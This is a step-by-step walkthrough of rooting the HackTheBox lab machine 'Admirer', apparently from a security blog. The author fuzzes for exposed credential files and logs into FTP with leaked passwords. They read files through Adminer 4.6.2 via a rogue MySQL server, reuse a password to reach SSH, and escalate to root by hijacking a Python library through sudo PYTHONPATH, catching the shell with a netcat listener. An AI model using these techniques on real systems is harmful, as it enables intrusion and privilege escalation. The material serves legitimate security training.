Admirer HackTheBox WalkThrough
This is Admirer HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Admirer HackTheBox machine. Let us know something about this machine. It is a Linux machine with IP address 10.10.10.187 and difficulty easy assigned by its maker.
Before starting, connect your PC with VPN and make sure your connectivity with admirer machine by pinging the IP 10.10.10.187. If all correct then start hacking. As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning. Nmap (a port scanner) gave the following result:-
Scanning
$ nmap -sV -sC -oN admirer_scan 10.10.10.187
Nmap revealed that ports 21, 22 and 80 are open. Vsftpd on port 21, SSH on port 22 and Apache2 web server on port 80 are running. Searched available public exploits for vsftpd 3.0.3 using searchsploit tool but no exploit is present for this version of vsftpd. Tried anonymous login to ftp using credential anonymous : anonymous but login failed. Left it here and moved forward for further enumeration. We have port 80 open so there may be some website hosted on apache2 web server which is running on this port. Ongoing to the URL http://10.10.10.187/, got a web page containing many number of images.
Tried to enumerate more on this page but got no hint. Even, page source did not give any proper hint to proceed further. Checked robots.txt file and got a disallowed folder named, admin-dir and a user named waldo. Added this user to my notes as it can be our potential user. The robots.txt file also gave hints about contacts and creds file inside admin-dir.
Soon I got some hints about these important files, immediately FUZZED for these files assuming they may be text files.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50
Fuzzing revealed contacts.txt and credentials.txt. These files are present at URLs http://10.10.10.187/admin-dir/contacts.txt & http://10.10.10.187/admin-dir/credentials.txt respectively.
Both the files contains many credentials along with lots of potentials usernames and passwords. The useful credentials for us is FTP account creds because we have port no 21 open and ftp server is running on it. The FTP credential is ftpuser : %n?4Wz}R$tTF7.
Login to FTP Account
$ ftp 10.10.10.187
~ftpuser
~%n?4Wz}R$tTF7
Got two files dump.sql and html.tar.gz inside the ftp directory. Downloaded them on my local machine using mget ftp command, to enumerate them further.
ftp> ls
ftp> mget dump.sql html.tar.gz //To download both files to local machine
ftp> pwd
After enumerating contents of all the downloaded files, got some useful information, which I have listed below.
Got information about database name from dump.sql file.
Got database username and password from db_admin.php file.
Database: admirerdb
Username: waldo
Password: Wh3r3_1s_w4ld0?
We have database credential. Since we do not have port 3306 open on admirer machine so, we cannot connect to database remotely. Perhaps, the database credential is useless till now. After properly reading the contents of the file, db_admin.php got some hints
// TODO: Finish implementing this or find a better open source alternative.
I just tried fuzzing to find names of some file using wfuzz with extensions php, txt and html.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Fuzzing listed three files namely adminer.php, info.php and phptest.php. After going to URL, http://10.10.10.187/utility-scripts/adminer.php found login panel of adminer (a remote Database Administration tools just like PhpMyAdmin written in php language) along with the installed version of Admirer Software, which is 4.6.2. Soon I get information of software and its version, immediately I searched for public exploit. After googling, admirer 4.6.2 exploit got this article in very first page of the search results. For more info on how this vulnerability works read above article.
A snippet on ‘how this exploit work’ is attached below.
To exploit this vulnerability I did the following things: –
Configure MySQL Server
1. Installed MySQL server on my local machine (MySQL is present in Kali by default). In other distro, use below command to install.
$apt install default-mysql-server
2. Started MySQL service
$systemctl start mysql
3. Logged in into MySQL server through the default root credential which is username : root & password : ‘ ‘ [Blank]
$mysql -u'root'
4. Created a new user dkm through which anyone can access to this server remotely.
MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';
5. Grant all privilege to the user dkm to access databases.
MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';
6. Reload all privileges.
MariaDB [(none)]> FLUSH PRIVILEGES;
7. Created database admirer and created a table test inside this database.
MariaDB [(none)]> create database admirer;
MariaDB [(none)]> use admirer;
MariaDB [admirer]> create table test(name varchar(255));
MariaDB [admirer]> exit;
8. Allowed remote hosts to connect to this sql server. We can allow remote connection by changing bind address to 0.0.0.0 instead of 127.0.0.1 in the file 50-server.cnf at directory /etc/mysql/mariadb.conf.d/.
9. Restart MySQL Server to apply the changes
$systemctl restart mysql
10. Confirmed the connectivity to the server by logging into the server through the user dkm and password mypassword.
$mysql -u'dkm' -p'mypassword' -h localhost
11. At last, logged in into adminer login panel through the creds of newly created users.
Logged in into MySQL server through the adminer login panel located at URL http://10.10.10.187/utility-scripts/adminer.php by using the credentials as
System: MySQL
Server: 10.10.14.14 (My tun0 IP)
Username: dkm
Password: mypassword
Database: admirer
After login, select SQL Command option on left pane.
Enter the following commands to load index.php file and click execute.
load data local infile '../index.php'
into table test
fields terminated by "/n"
For more info about load data, you can read here.
After the command is successfully executed click, select on left pane to list the content of the loaded file.
After loading the file index.php, got the following contents. A snippet of the content is given below.
From above file extracted credential waldo: &<h5b~yK3F#{PaPB&dA}{H>
According to the above file, this credential looks to be for accessing admirer database. However, we do not have any port listening for database connection (confirmed through nmap scan). So tried this credential to login into SSH account of user waldo and successfully logged in. This happened because database credential is reused.
Gaining User Access
$ ssh [email protected]
~&<h5b~yK3F#{PaPB&dA}{H>
$ whoami && id
Capture User Flag
$cat user.txt
Privilege Escalation
Finding PrivEsc Vector
$sudo -l command revealed that:
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
Alternatively, we can say user waldo may run admin_tasks.sh script as root.
Since user waldo can run admin_tasks.sh script with root privilege therefore all the files or commands which are executed inside this script will also have the same level of privilege as root. The function backup_web() inside admin_tasks.sh calls backup.py file which is present inside /opt/scripts/ directory. So when we execute admin_tasks.sh, backup.py will also be executed as root. Since it is calling shutil library therefore there can be a chance of Python Library Hijacking.
So here, our privilege escalation vector can be via Python Library Hijacking. Check this article for more info about PLH.
Content of backup.py file
To perform python library hijacking and getting root shell I did the following things:
Started Netcat listener in one terminal
$nc -nvlp 1234
And ran the following command in other terminal
$ mkdir /tmp/ethicalhacs
$ nano /tmp/ethicalhacs/shutil.py
$ cat /tmp/ethicalhacs/shutil.py
$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh
~Choose an option: 6
We can see we have successfully escalated the privilege to admin by Python Library hijacking.
Capture Root Flag
$cat /root/root.txt
This was how I rooted to Admirer HackTheBox machine. Thanks for reading this walkthrough. Learnt a lot after rooting this box. Hope you guys have also learnt some new things. Feel free to share your experience in the comment section. For any query and suggestion related to walkthrough, feel free to write us at [email protected].
Really like articles on ethicalhacs.com, you can now support us by buying us coffee.
